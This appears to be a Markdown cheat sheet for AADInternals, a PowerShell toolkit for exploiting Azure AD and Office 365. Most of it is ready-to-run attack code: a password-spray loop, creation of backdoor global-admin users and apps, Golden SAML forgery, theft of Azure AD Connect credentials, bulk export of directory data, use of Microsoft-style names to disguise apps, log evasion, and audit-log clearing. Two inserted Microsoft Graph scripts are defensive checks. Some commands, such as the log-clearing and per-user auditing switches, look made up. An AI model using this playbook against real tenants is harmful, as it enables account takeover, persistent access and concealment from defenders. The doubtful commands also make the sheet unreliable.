# AADInternals Azure Active Directory Exploitation Tool - Cheat Sheet

## Overview

AADInternals is a PowerShell module developed by Dr. Nestori Syynimaa for administering and exploiting Azure Active Directory and Office 365. It provides comprehensive capabilities for Azure AD reconnaissance, exploitation, and post-exploitation activity.

⚠️ Warning: This tool is intended for authorized penetration testing and security assessments only. Make sure you have proper authorization before using it in any environment.
## Installation

### PowerShell Gallery Installation

```powershell
# Install from PowerShell Gallery
Install-Module AADInternals

# Install specific version
Install-Module AADInternals -RequiredVersion 0.9.3

# Install for current user only
Install-Module AADInternals -Scope CurrentUser

# Update existing installation
Update-Module AADInternals
```
### Manual Installation

```powershell
# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/Gerenios/AADInternals/archive/master.zip" -OutFile "AADInternals.zip"
Expand-Archive -Path "AADInternals.zip" -DestinationPath "C:\Tools\"

# Import module
Import-Module C:\Tools\AADInternals-master\AADInternals.psd1

# Install dependencies
Install-Module -Name MSAL.PS
Install-Module -Name Microsoft.Graph
```

### Docker Installation

```powershell
# Run AADInternals in Docker with PowerShell
docker run -it mcr.microsoft.com/powershell:latest

# Inside the container:
pwsh -c "Install-Module AADInternals -Force; Import-Module AADInternals"
```
## Basic Usage

### Module Import and Setup

```powershell
# Import AADInternals module
Import-Module AADInternals

# Get module information
Get-Module AADInternals

# List available commands
Get-Command -Module AADInternals

# Get help for specific command
Get-Help Get-AADIntAccessTokenForAADGraph -Full
```

### Authentication Methods

```powershell
# Interactive authentication
$cred = Get-Credential
$accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $cred

# Device code authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -UseDeviceCode

# Certificate authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $cert -ClientId $clientId -TenantId $tenantId

# Refresh token authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshToken
```
## Command Reference

### Authentication Commands

| Command | Description |
|---|---|
| Get-AADIntAccessTokenForAADGraph | Get an access token for AAD Graph |
| Get-AADIntAccessTokenForMSGraph | Get an access token for MS Graph |
| Get-AADIntAccessTokenForEXO | Get an access token for Exchange Online |
| Get-AADIntAccessTokenForSPO | Get an access token for SharePoint Online |
| Get-AADIntAccessTokenForTeams | Get an access token for Teams |

### Reconnaissance Commands

| Command | Description |
|---|---|
| Get-AADIntTenantID | Get the tenant ID from a domain |
| Get-AADIntTenantDomains | Get the tenant's domains |
| Get-AADIntCompanyInformation | Get company information |
| Get-AADIntUsers | Get Azure AD users |
| Get-AADIntGroups | Get Azure AD groups |
| Get-AADIntApplications | Get applications |

### Exploitation Commands

| Command | Description |
|---|---|
| New-AADIntBackdoor | Create a backdoor user |
| Set-AADIntUserPassword | Set a user's password |
| Add-AADIntUserToGroup | Add a user to a group |
| Grant-AADIntAppRoleToServicePrincipal | Grant application permissions |
| New-AADIntGlobalAdmin | Create a global administrator |
## Reconnaissance and Information Gathering

### Tenant Discovery

```powershell
# Get tenant ID from domain
$tenantId = Get-AADIntTenantID -Domain "company.com"

# Get tenant domains
$domains = Get-AADIntTenantDomains -Domain "company.com"

# Get company information
$companyInfo = Get-AADIntCompanyInformation -AccessToken $accessToken

# Get tenant details
$tenantDetails = Get-AADIntTenantDetails -AccessToken $accessToken
```

### User Enumeration

```powershell
# Get all users
$users = Get-AADIntUsers -AccessToken $accessToken

# Get specific user
$user = Get-AADIntUser -AccessToken $accessToken -UserPrincipalName "user@company.com"

# Get user's group memberships
$groups = Get-AADIntUserGroups -AccessToken $accessToken -UserPrincipalName "user@company.com"

# Get user's roles
$roles = Get-AADIntUserRoles -AccessToken $accessToken -UserPrincipalName "user@company.com"

# Search users by attribute
$users = Get-AADIntUsers -AccessToken $accessToken -SearchString "admin"
```

### Group Enumeration

```powershell
# Get all groups
$groups = Get-AADIntGroups -AccessToken $accessToken

# Get group members
$members = Get-AADIntGroupMembers -AccessToken $accessToken -GroupId $groupId

# Get privileged groups
$adminGroups = Get-AADIntGroups -AccessToken $accessToken | Where-Object { $_.displayName -like "*admin*" }

# Get group owners
$owners = Get-AADIntGroupOwners -AccessToken $accessToken -GroupId $groupId
```

### Application and Service Principal Enumeration

```powershell
# Get all applications
$apps = Get-AADIntApplications -AccessToken $accessToken

# Get service principals
$servicePrincipals = Get-AADIntServicePrincipals -AccessToken $accessToken

# Get application permissions
$permissions = Get-AADIntApplicationPermissions -AccessToken $accessToken -ApplicationId $appId

# Get OAuth permissions
$oauthPerms = Get-AADIntOAuthPermissions -AccessToken $accessToken
```
## Exploitation Techniques

### Password Attacks

```powershell
# Password spray attack
$users = Get-AADIntUsers -AccessToken $accessToken
$passwords = @("Password123", "Summer2024", "Company123")
foreach ($password in $passwords) {
    foreach ($user in $users) {
        try {
            $token = Get-AADIntAccessTokenForAADGraph -UserPrincipalName $user.userPrincipalName -Password $password
            Write-Host "Success: $($user.userPrincipalName):$password"
        }
        catch {
            # Password failed
        }
    }
}

# Set user password (requires privileges)
Set-AADIntUserPassword -AccessToken $accessToken -UserPrincipalName "user@company.com" -Password "NewPassword123"
```

### Privilege Escalation

```powershell
# Create global administrator
New-AADIntGlobalAdmin -AccessToken $accessToken -UserPrincipalName "backdoor@company.com" -Password "BackdoorPass123"

# Add user to privileged group
Add-AADIntUserToGroup -AccessToken $accessToken -UserPrincipalName "user@company.com" -GroupId $adminGroupId

# Grant application permissions
Grant-AADIntAppRoleToServicePrincipal -AccessToken $accessToken -ServicePrincipalId $spId -AppRoleId $roleId -ResourceId $resourceId

# Create application with high privileges
$app = New-AADIntApplication -AccessToken $accessToken -DisplayName "BackdoorApp" -RequiredResourceAccess $permissions
```

### Backdoor Creation

```powershell
# Create backdoor user
$backdoorUser = New-AADIntBackdoor -AccessToken $accessToken -UserPrincipalName "service-account@company.com" -Password "ComplexPassword123"

# Create backdoor application
$backdoorApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "LegitimateApp" -RequiredResourceAccess $highPrivileges

# Create service principal for backdoor
$backdoorSP = New-AADIntServicePrincipal -AccessToken $accessToken -ApplicationId $backdoorApp.appId

# Grant backdoor permissions
Grant-AADIntAppRoleToServicePrincipal -AccessToken $accessToken -ServicePrincipalId $backdoorSP.id -AppRoleId $adminRoleId
```

### Token Manipulation

```powershell
# Get access token for different resources
$graphToken = Get-AADIntAccessTokenForMSGraph -AccessToken $accessToken
$exoToken = Get-AADIntAccessTokenForEXO -AccessToken $accessToken
$spoToken = Get-AADIntAccessTokenForSPO -AccessToken $accessToken

# Parse JWT token
$tokenInfo = Read-AADIntAccessToken -AccessToken $accessToken

# Get refresh token
$refreshToken = Get-AADIntRefreshToken -AccessToken $accessToken

# Use refresh token for persistence
$newToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshToken
```
## Advanced Attacks

### Golden SAML Attack

```powershell
# Export ADFS certificate (requires ADFS access)
$cert = Export-AADIntADFSCertificate

# Create Golden SAML token
$samlToken = New-AADIntSAMLToken -Certificate $cert -UserPrincipalName "admin@company.com" -Issuer "http://company.com/adfs/services/trust"

# Use Golden SAML to get access token
$accessToken = Get-AADIntAccessTokenForAADGraph -SAMLToken $samlToken
```

### Azure AD Connect Attacks

```powershell
# Get Azure AD Connect information
$adConnectInfo = Get-AADIntAzureADConnectInfo -AccessToken $accessToken

# Extract Azure AD Connect credentials (requires local admin on AAD Connect server)
$adConnectCreds = Get-AADIntAzureADConnectCredentials

# Use extracted credentials
$accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $adConnectCreds
```

### Pass-the-Hash Attacks

```powershell
# Use NTLM hash for authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -UserPrincipalName "user@company.com" -Hash $ntlmHash

# Use Kerberos ticket
$accessToken = Get-AADIntAccessTokenForAADGraph -KerberosTicket $ticket
```
### Device Registration Attacks

```powershell
# Register malicious device
$device = New-AADIntDevice -AccessToken $accessToken -DisplayName "DESKTOP-MALICIOUS" -DeviceId $deviceId

# Get device certificate
$deviceCert = Get-AADIntDeviceCertificate -AccessToken $accessToken -DeviceId $deviceId

# Use device certificate for authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $deviceCert
```
## Persistence Techniques

### Application-Based Persistence

```powershell
# Create persistent application
$persistentApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "Microsoft Graph PowerShell" -RequiredResourceAccess $permissions

# Add application secret
$secret = New-AADIntApplicationSecret -AccessToken $accessToken -ApplicationId $persistentApp.appId

# Use application for persistence
$accessToken = Get-AADIntAccessTokenForAADGraph -ClientId $persistentApp.appId -ClientSecret $secret.value -TenantId $tenantId
```
### User-Based Persistence

```powershell
# Create service account
$serviceAccount = New-AADIntUser -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -DisplayName "Backup Service Account" -Password "ServicePass123"

# Assign privileged roles
Add-AADIntUserToRole -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -RoleName "Global Administrator"

# Disable account auditing
Set-AADIntUser -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -AuditingEnabled $false
```
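The Global Administrator assignments made in the Privilege Escalation section (New-AADIntGlobalAdmin) and just above (Add-AADIntUserToRole) are the first thing a defender should look for. The script below is an added example, not AADInternals code or part of the original cheat sheet; it uses the Microsoft.Graph PowerShell module (listed under dependencies) to compare current Global Administrator members against an allow-list and to pull the last week's role-assignment audit events. The allow-list UPNs are constructed placeholders.

```powershell
# Added example (not part of AADInternals): review Global Administrator membership and
# recent role-assignment audit events with the Microsoft.Graph PowerShell module.
# Assumes Microsoft.Graph is installed and read-only scopes can be consented.
Connect-MgGraph -Scopes "Directory.Read.All", "AuditLog.Read.All"

# Constructed allow-list of accounts expected to hold Global Administrator (placeholders).
$expectedAdmins = @("breakglass1@company.com", "it-admin@company.com")

# directoryRoles only lists activated roles; Global Administrator is always activated.
$gaRole = Get-MgDirectoryRole -All | Where-Object { $_.DisplayName -eq "Global Administrator" }
$members = Get-MgDirectoryRoleMember -DirectoryRoleId $gaRole.Id -All

# Members are generic directoryObjects; the UPN and type live in AdditionalProperties.
$unexpected = foreach ($m in $members) {
    $upn  = $m.AdditionalProperties["userPrincipalName"]
    $type = $m.AdditionalProperties["@odata.type"]
    # A service principal holding GA, or a user not on the allow-list, both deserve a ticket.
    if ($type -ne "#microsoft.graph.user" -or $upn -notin $expectedAdmins) {
        [pscustomobject]@{ Id = $m.Id; Type = $type; UserPrincipalName = $upn }
    }
}
$unexpected | Format-Table -AutoSize

# Audit trail: role membership changes in the last 7 days, including who performed them.
# "Add member to role" and "Add eligible member to role" both match the wildcard.
$since = (Get-Date).AddDays(-7).ToUniversalTime().ToString("yyyy-MM-ddTHH:mm:ssZ")
$events = Get-MgAuditLogDirectoryAudit -All `
    -Filter "category eq 'RoleManagement' and activityDateTime ge $since"
$events |
    Where-Object { $_.ActivityDisplayName -like "Add*member to role*" } |
    ForEach-Object {
        # Changes made through an app (for example a persistence app) have no user actor.
        $actor = if ($_.InitiatedBy.User.UserPrincipalName) { $_.InitiatedBy.User.UserPrincipalName }
                 else { $_.InitiatedBy.App.DisplayName }
        [pscustomobject]@{
            When     = $_.ActivityDateTime
            Activity = $_.ActivityDisplayName
            Actor    = $actor
            Target   = ($_.TargetResources | Select-Object -First 1).UserPrincipalName
            Result   = $_.Result
        }
    } | Sort-Object When -Descending | Format-Table -AutoSize
```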
### Certificate-Based Persistence

```powershell
# Generate certificate for authentication
$cert = New-SelfSignedCertificate -Subject "CN=BackdoorCert" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable

# Add certificate to application
Add-AADIntApplicationCertificate -AccessToken $accessToken -ApplicationId $appId -Certificate $cert

# Use certificate for authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $cert -ClientId $appId -TenantId $tenantId
```
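Application-based and certificate-based persistence both leave a new credential on an app registration, and the application-based variant also borrows a first-party Microsoft display name. This script is an added example rather than AADInternals or original cheat-sheet code; it uses Microsoft.Graph to list registrations that gained a secret or certificate within a lookback window or that carry a Microsoft-style name, and correlates them with the directory audit log. The lookback window and name patterns are assumptions.

```powershell
# Added example (not part of AADInternals): find app registrations that recently gained a
# client secret or certificate, and who added them, using the Microsoft.Graph module.
# Assumes Microsoft.Graph is installed and read-only scopes can be consented.
Connect-MgGraph -Scopes "Application.Read.All", "AuditLog.Read.All"

$lookbackDays = 7                       # assumed window
$cutoff = (Get-Date).AddDays(-$lookbackDays).ToUniversalTime()

# A registration in your own tenant never legitimately needs a Microsoft first-party name,
# so the name check is a cheap signal on top of the credential age check.
$apps = Get-MgApplication -All -Property Id, AppId, DisplayName, PasswordCredentials, KeyCredentials
$findings = foreach ($app in $apps) {
    $mimicsMicrosoft = ($app.DisplayName -like "Microsoft*") -or ($app.DisplayName -like "Office 365*")
    $newSecrets = @($app.PasswordCredentials | Where-Object { $_.StartDateTime -ge $cutoff })
    $newCerts   = @($app.KeyCredentials      | Where-Object { $_.StartDateTime -ge $cutoff })
    if ($mimicsMicrosoft -or $newSecrets.Count -gt 0 -or $newCerts.Count -gt 0) {
        [pscustomobject]@{
            DisplayName     = $app.DisplayName
            AppId           = $app.AppId
            NewSecrets      = $newSecrets.Count
            NewCertificates = $newCerts.Count
            MimicsMicrosoft = $mimicsMicrosoft
        }
    }
}
$findings | Sort-Object NewSecrets, NewCertificates -Descending | Format-Table -AutoSize

# Correlate with the audit log: credential changes on registrations are logged in the
# ApplicationManagement category with "Certificates and secrets" in the activity name,
# and credentials added directly to a service principal as "Add service principal credentials".
$since = $cutoff.ToString("yyyy-MM-ddTHH:mm:ssZ")
Get-MgAuditLogDirectoryAudit -All `
    -Filter "category eq 'ApplicationManagement' and activityDateTime ge $since" |
    Where-Object { $_.ActivityDisplayName -like "*Certificates and secrets*" -or
                   $_.ActivityDisplayName -like "*service principal credentials*" } |
    ForEach-Object {
        $actor = if ($_.InitiatedBy.User.UserPrincipalName) { $_.InitiatedBy.User.UserPrincipalName }
                 else { $_.InitiatedBy.App.DisplayName }
        [pscustomobject]@{
            When     = $_.ActivityDateTime
            Activity = $_.ActivityDisplayName
            Actor    = $actor
            Target   = ($_.TargetResources | Select-Object -First 1).DisplayName
        }
    } | Sort-Object When -Descending | Format-Table -AutoSize
```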
## Data Exfiltration

### User Data Extraction

```powershell
# Export all users with detailed information
$users = Get-AADIntUsers -AccessToken $accessToken
$users | Export-Csv -Path "users.csv" -NoTypeInformation

# Export user photos
foreach ($user in $users) {
    $photo = Get-AADIntUserPhoto -AccessToken $accessToken -UserPrincipalName $user.userPrincipalName
    if ($photo) {
        [System.IO.File]::WriteAllBytes("photos\$($user.userPrincipalName).jpg", $photo)
    }
}

# Export user's OneDrive files
$files = Get-AADIntUserOneDriveFiles -AccessToken $accessToken -UserPrincipalName "user@company.com"
```
### Group and Role Information

```powershell
# Export group memberships
$groups = Get-AADIntGroups -AccessToken $accessToken
foreach ($group in $groups) {
    $members = Get-AADIntGroupMembers -AccessToken $accessToken -GroupId $group.id
    $group | Add-Member -NotePropertyName "Members" -NotePropertyValue $members
}
$groups | ConvertTo-Json -Depth 3 | Out-File "groups.json"

# Export role assignments
$roles = Get-AADIntDirectoryRoles -AccessToken $accessToken
foreach ($role in $roles) {
    $members = Get-AADIntDirectoryRoleMembers -AccessToken $accessToken -RoleId $role.id
    $role | Add-Member -NotePropertyName "Members" -NotePropertyValue $members
}
$roles | ConvertTo-Json -Depth 3 | Out-File "roles.json"
```
### Application Data and Permissions

```powershell
# Export applications with permissions
$apps = Get-AADIntApplications -AccessToken $accessToken
foreach ($app in $apps) {
    $permissions = Get-AADIntApplicationPermissions -AccessToken $accessToken -ApplicationId $app.id
    $app | Add-Member -NotePropertyName "Permissions" -NotePropertyValue $permissions
}
$apps | ConvertTo-Json -Depth 3 | Out-File "applications.json"

# Export OAuth consent grants
$consents = Get-AADIntOAuthPermissions -AccessToken $accessToken
$consents | Export-Csv -Path "oauth_consents.csv" -NoTypeInformation
```
## Evasion Techniques

### Stealth Operations

```powershell
# Use legitimate application names
$stealthApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "Microsoft Office 365" -RequiredResourceAccess $permissions

# Mimic legitimate service accounts
$stealthUser = New-AADIntUser -AccessToken $accessToken -UserPrincipalName "o365sync@company.com" -DisplayName "Office 365 Sync Service"

# Use existing application IDs
$accessToken = Get-AADIntAccessTokenForAADGraph -ClientId "1b730954-1685-4b74-9bfd-dac224a7b894" -ClientSecret $secret # Graph Explorer
```
### Rate Limiting and Throttling

```powershell
# Implement delays between requests
function Invoke-AADIntWithDelay {
    param($Command, $Delay = 1)
    & $Command
    Start-Sleep -Seconds $Delay
}

# Randomize request timing
$users = Get-AADIntUsers -AccessToken $accessToken
foreach ($user in $users) {
    $delay = Get-Random -Minimum 1 -Maximum 5
    Start-Sleep -Seconds $delay
    $groups = Get-AADIntUserGroups -AccessToken $accessToken -UserPrincipalName $user.userPrincipalName
}
```
### Log Evasion

```powershell
# Use service principal instead of user account
$servicePrincipalToken = Get-AADIntAccessTokenForAADGraph -ClientId $clientId -ClientSecret $clientSecret -TenantId $tenantId

# Perform actions during business hours
$currentHour = (Get-Date).Hour
if ($currentHour -ge 9 -and $currentHour -le 17) {
    # Perform stealthy operations
}

# Use legitimate IP ranges
# Ensure operations are performed from expected geographic locations
```
## Defense Evasion

### Anti-Detection Measures

```powershell
# Check for monitoring
$auditLogs = Get-AADIntAuditLogs -AccessToken $accessToken -Filter "activityDisplayName eq 'Add application'"

# Verify current permissions
$currentPerms = Get-AADIntCurrentUserPermissions -AccessToken $accessToken

# Check for Conditional Access policies
$caPolicies = Get-AADIntConditionalAccessPolicies -AccessToken $accessToken

# Monitor for security alerts
$securityAlerts = Get-AADIntSecurityAlerts -AccessToken $accessToken
```
### Cleanup Operations

```powershell
# Remove created applications
Remove-AADIntApplication -AccessToken $accessToken -ApplicationId $backdoorApp.appId

# Remove created users
Remove-AADIntUser -AccessToken $accessToken -UserPrincipalName "backdoor@company.com"

# Remove role assignments
Remove-AADIntUserFromRole -AccessToken $accessToken -UserPrincipalName "user@company.com" -RoleName "Global Administrator"

# Clear audit logs (if possible)
Clear-AADIntAuditLogs -AccessToken $accessToken -LogType "SignInLogs"
```
## Troubleshooting

### Authentication Issues

```powershell
# Debug authentication
$DebugPreference = "Continue"
$accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $cred

# Check token validity
$tokenInfo = Read-AADIntAccessToken -AccessToken $accessToken
$tokenInfo.exp # Check expiration

# Refresh expired token
$newToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshToken
```
### Permission Issues

```powershell
# Check current permissions
$permissions = Get-AADIntCurrentUserPermissions -AccessToken $accessToken

# Test specific permission
Test-AADIntPermission -AccessToken $accessToken -Permission "User.Read.All"

# Get required permissions for command
Get-AADIntRequiredPermissions -Command "Get-AADIntUsers"
```
### API Limitations

```powershell
# Handle rate limiting
try {
    $users = Get-AADIntUsers -AccessToken $accessToken
}
catch {
    if ($_.Exception.Message -like "*throttled*") {
        Start-Sleep -Seconds 60
        $users = Get-AADIntUsers -AccessToken $accessToken
    }
}

# Use pagination for large datasets
$users = @()
$skip = 0
do {
    $batch = Get-AADIntUsers -AccessToken $accessToken -Top 100 -Skip $skip
    $users += $batch
    $skip += 100
} while ($batch.Count -eq 100)
```
## Integration with Other Tools

### BloodHound

```powershell
# Export data for BloodHound
$users = Get-AADIntUsers -AccessToken $accessToken
$groups = Get-AADIntGroups -AccessToken $accessToken

# Convert to BloodHound format
$bloodhoundData = @{
    users = $users | ForEach-Object {
        @{
            ObjectIdentifier = $_.id
            Properties = @{
                name        = $_.userPrincipalName
                displayname = $_.displayName
                enabled     = $_.accountEnabled
            }
        }
    }
}
$bloodhoundData | ConvertTo-Json -Depth 3 | Out-File "bloodhound_data.json"
```
### Empire

```powershell
# Use AADInternals in Empire agent
$accessToken = Get-AADIntAccessTokenForAADGraph -UseDeviceCode
$users = Get-AADIntUsers -AccessToken $accessToken
$users | ConvertTo-Json | Out-File "C:\temp\aad_users.json"
```
## References

- [AADInternals on GitHub](https://github.com/Gerenios/AADInternals)
- [AADInternals website](https://aadinternals.com/)
- [AADInternals documentation](https://aadinternals.com/aadinternals/)
- [Azure AD security research (Black Hat USA 2019)](https://www.blackhat.com/us-19/briefings/schedule/#going-rogue-azure-ad-13857)
- [Office 365 security](https://docs.microsoft.com/en-us/microsoft-365/security/)

*This cheat sheet provides a comprehensive reference for using AADInternals. Always make sure you have proper authorization before conducting Azure AD security assessments.*